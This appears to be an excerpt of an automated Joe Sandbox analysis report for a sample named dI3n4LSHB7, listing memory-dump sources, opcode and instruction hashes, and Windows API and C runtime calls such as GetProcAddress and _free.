                                                                                • Instruction ID: b0073b4e81b3b4c6f351a2a9ec2f3d3e844e2345d86076d65bf3a09a20e5d24f
                                                                                • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                                • Instruction Fuzzy Hash: 07B1F7356106099FDB19CF28C48AB657BE0FF45364F29C658E89ACF2E1C735E992CB40
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_aaa000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 54289c7eabfa0ef1bb488059b096594d0b791a0cffce9ba6288eb56bf0b199c1
                                                                                • Instruction ID: 0adcf07a5d201ce6a878a3b828a7e932198fe3262e0a86f79110df79b1c7d1f7
                                                                                • Opcode Fuzzy Hash: 54289c7eabfa0ef1bb488059b096594d0b791a0cffce9ba6288eb56bf0b199c1
                                                                                • Instruction Fuzzy Hash: A391D0B200D3C49FE3079B248854599BFA4EF93320F0A8ADFC5C08B5A3D3285905D763
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 68f0958de98df62d5625f0fd4134cd568bd43834ce1c9d7f91fbdc847045fc7a
                                                                                • Instruction ID: 3b2be301a93f61c0bf256ea8a25458e1e008df020c39a557adb3e76cdca8889d
                                                                                • Opcode Fuzzy Hash: 68f0958de98df62d5625f0fd4134cd568bd43834ce1c9d7f91fbdc847045fc7a
                                                                                • Instruction Fuzzy Hash: 285147F3B152109BE3085E2DDC947BAB7D6EBE4320F2A853DEB85877C4DD7908084286
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d5980fe87ef19a2d77f8c8a35aa4387ea311ee7d8c5b57da9ae3d6a0837ff687
                                                                                • Instruction ID: ad99b33392dfbcb25e9e56cbb228ef126e1e9061257936b61597deceb48a1374
                                                                                • Opcode Fuzzy Hash: d5980fe87ef19a2d77f8c8a35aa4387ea311ee7d8c5b57da9ae3d6a0837ff687
                                                                                • Instruction Fuzzy Hash: 5751E3B248C21E9FEB02CF55C6415EE7BF9FE86334B30416AE802D7E02D2B21D559A59
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_aaa000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5d7b6545bce6975bfd908e64564059234bc108737cabc2f17580d28e8376b4c9
                                                                                • Instruction ID: 67840ee86cc9063f3db90d40e93c9b9c968ea2a5dbb2f3e9271b0fdaa251ebb7
                                                                                • Opcode Fuzzy Hash: 5d7b6545bce6975bfd908e64564059234bc108737cabc2f17580d28e8376b4c9
                                                                                • Instruction Fuzzy Hash: E351D1B250C644DFE315FE29D88553EFBF1EB95310F26892DE9C287684EB311851AB83
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                                                • Instruction ID: 724bc7ef692b0ef9119f38d15fea39291f2f972e93ae0160779d16b99792f805
                                                                                • Opcode Fuzzy Hash: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                                                • Instruction Fuzzy Hash: 01519AB1E003058FEB64DF58DD817AEBBF2FB48314F54852AD901EB254D338AA11CB65
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f2544c4eb05c15770695adfbe6843487831e8f532f83d230514e0653ae742c6
                                                                                • Instruction ID: 116a540c87be1ecdaf8a81465e5c6b1c8b71327d39c53d6b81832fd7e8a4b960
                                                                                • Opcode Fuzzy Hash: 6f2544c4eb05c15770695adfbe6843487831e8f532f83d230514e0653ae742c6
                                                                                • Instruction Fuzzy Hash: CB3159F7B692146FE314696DED8477BB3DADBD4321F2A813AE784C3744ED74480242A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 585d39a3ea1f1738e81b9fca519d9f78799d03ac124d95e77f67c8b65e852d42
                                                                                • Instruction ID: 7f47c5f276ff15fa2986d8f0eff1de13f8c6c7784bc779de3f73eeb81892b9fc
                                                                                • Opcode Fuzzy Hash: 585d39a3ea1f1738e81b9fca519d9f78799d03ac124d95e77f67c8b65e852d42
                                                                                • Instruction Fuzzy Hash: 194147F3E182148BF3446E3DDD5A327BADADBD0220F2F423D9988D7794E83999054289
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1aae51d8d5e3293992f9e76863a621a689e05417f71320008de4f7c641bcc1d1
                                                                                • Instruction ID: c0e771692fe80e54786627d8a99d30b247a92beec8e4065530aba10ae19e17ff
                                                                                • Opcode Fuzzy Hash: 1aae51d8d5e3293992f9e76863a621a689e05417f71320008de4f7c641bcc1d1
                                                                                • Instruction Fuzzy Hash: D34179F3A182105BF3189939DDA5777B696E7C4320F1A823EDB82D7BC4E8785C414295
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                                • Instruction ID: 836b5d193dfdd3b559c4c278e71c64bbacdd838400c51d71b892fa9245357d27
                                                                                • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                                • Instruction Fuzzy Hash: 2A21B373F204394B7B0CC57ECC522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                                • Instruction ID: 53a9b4596741b4d703b3dee2c66b20d577f2960826688a38eeab8e35c5903ed5
                                                                                • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                                • Instruction Fuzzy Hash: 2321B373F205394B7B0CC57E8C522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                                • Instruction ID: 1ad9d6d7365e600a7bb69782b0834f4d420f3f91d9e0c3ac1aa475b9fcfe298e
                                                                                • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                                • Instruction Fuzzy Hash: 6521B673F2043947770CC57ECC522BDB6E1C78C501745423AE8A6EA2C1D96CD917E2E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 318c8b56382c24f87e4e08d53ca266a216d7184c30161edc245b026bd0af3981
                                                                                • Instruction ID: 3e5b856a5a038872342e3348678df4cd4d931f478909975c57458f0343994d6c
                                                                                • Opcode Fuzzy Hash: 318c8b56382c24f87e4e08d53ca266a216d7184c30161edc245b026bd0af3981
                                                                                • Instruction Fuzzy Hash: AB21E2F3E083105BD3046A6DECC5757F7D8EB59720F4A053DE688D7380E634580046A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                                • Instruction ID: 1358fd26e9908f79ee1e23fc8a3f6b58dc5e037ed3035296328e616b384492ff
                                                                                • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                                • Instruction Fuzzy Hash: 1E11A363F30C256B675C81698C132BAA1D2EBD815030F433AD826E73C4E8A4EE23D290
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                                • Instruction ID: e73887866517eae7714d013718d8a8bd1de4ec71e4a0f3fa3c223a6bd36a49e9
                                                                                • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                                • Instruction Fuzzy Hash: 3911A723F30C255B675C81698C1727AA1D2DBDC14030F433AD826E7284E894DE13D290
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                                • Instruction ID: f1e66852e6b8581706c01849561528f719d4aeccf6fe4fc0aff0fb2656777429
                                                                                • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                                • Instruction Fuzzy Hash: D6118A73F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7284E998DE23D290
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction ID: 4d50343ea1dc0f71b4401922dd6807da43537b0dc4f1df8b5e80f4e4b510a8af
                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction Fuzzy Hash: DB11E2F724108243DED88A2ECCB47F7A797EBC632573C426AD2424BB58D23BB2559600
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction ID: 7a73fe8d35e3d71c5c24f5c0b821b3dd9abe8ae56d6465770b908d97031b84e3
                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction Fuzzy Hash: DC1108772C0151439695CB2DDDB41BAA796EBCD32072C46EAD0414F75AD122F544B600
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction ID: bf3d62387290270b8e9c206f9b330aa6ec5fad9da35dacc9460757c01b80fc97
                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction Fuzzy Hash: 43115EF730038143D704862EC5B45B7E395EBC6321B2F4B7BC0825B7C8C23A9865E50A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2421354084.0000000000D79000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D79000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_d79000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction ID: d1d1683c7831aa3da3bea11eb911afa43f3b6dc6641cfc39456a7e64fd464475
                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction Fuzzy Hash: B7113C73340100AFDB54DF55DC91FA6B3EAEB89360B298065ED08CB356E675E842C760
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction ID: 293818218bedeef1481949536c6cc3e7b8a6b3c3ef9f58d5a142aa209fb16be8
                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction Fuzzy Hash: 8801A276A006148FDF21EF24CC04BAA33F5EFC6216F4548F5EA0A9B281E774B9459B90
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                                                • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                                                • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                                                • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                                • Instruction ID: b4ae77fc90a4fa150eaddbe439427d48a112bff6acf9a5ab564842d58761aa4e
                                                                                • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                                • Instruction Fuzzy Hash: 89E08C32A12238EBCB24DB9DC908A8AF3ECEB45B04B118496B501D3140C6B0EE01C7E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                                • Instruction ID: 246488dfe49aa5c32b350fed1d045568dcfc0a17c0cb868f336d2f696df64edd
                                                                                • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                                • Instruction Fuzzy Hash: 39E08C72911268EBCB25DB8CC945E8AF3FCEB44B80B114496BD01D3220C270EE00C7D0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                                • Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
                                                                                • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                                • Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
                                                                                • Instruction ID: 23e5f59e324a4176bb4cb1d0277f51050953cdf21f1838d274749ce008d5f8ee
                                                                                • Opcode Fuzzy Hash: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
                                                                                • Instruction Fuzzy Hash: 53E04631400108BFCB117F14DC4CA8A3B2AEB00241B108424FA0986131CB39EE82CA54
                                                                                APIs
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
                                                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
                                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
                                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
                                                                                • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F
                                                                                Strings
                                                                                • kernel32.dll, xrefs: 004090AB
                                                                                • SleepConditionVariableCS, xrefs: 004090BC
                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A
                                                                                • WakeAllConditionVariable, xrefs: 004090C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                • API String ID: 2565136772-3242537097
                                                                                • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                                                • Instruction ID: acc3deda13f420712ce33b53dd37b90dad73ad81c8ab949137041f64949c0d3f
                                                                                • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                                                • Instruction Fuzzy Hash: 410196B1F40322ABE7202B75AD0DB963B989B4CB01B154036FD15E2295D77CCC01866D
                                                                                APIs
                                                                                • _free.LIBCMT ref: 04D0661C
                                                                                • ___free_lconv_mon.LIBCMT ref: 04D06627
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06300
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06312
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06324
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06336
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06348
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D0635A
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D0636C
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D0637E
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06390
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D063A2
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D063B4
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D063C6
                                                                                  • Part of subcall function 04D062E3: _free.LIBCMT ref: 04D063D8
                                                                                • _free.LIBCMT ref: 04D0663E
                                                                                • _free.LIBCMT ref: 04D06653
                                                                                • _free.LIBCMT ref: 04D0665E
                                                                                • _free.LIBCMT ref: 04D06680
                                                                                • _free.LIBCMT ref: 04D06693
                                                                                • _free.LIBCMT ref: 04D066A1
                                                                                • _free.LIBCMT ref: 04D066AC
                                                                                • _free.LIBCMT ref: 04D066E4
                                                                                • _free.LIBCMT ref: 04D066EB
                                                                                • _free.LIBCMT ref: 04D06708
                                                                                • _free.LIBCMT ref: 04D06720
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _free$___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 3658870901-0
                                                                                • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                                                • Instruction ID: 5df4256883318a2fe2d83c5e8559d2c5407becca14d74e488c561f6fdef36783
                                                                                • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                                                • Instruction Fuzzy Hash: 2D313731700601ABEB22AF39E844B5A77E9FF00314F54C86AE159E71D1DE76F8A18B20
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 04B5748E
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57167
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57179
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5718B
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5719D
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571AF
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571C1
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571D3
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571E5
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571F7
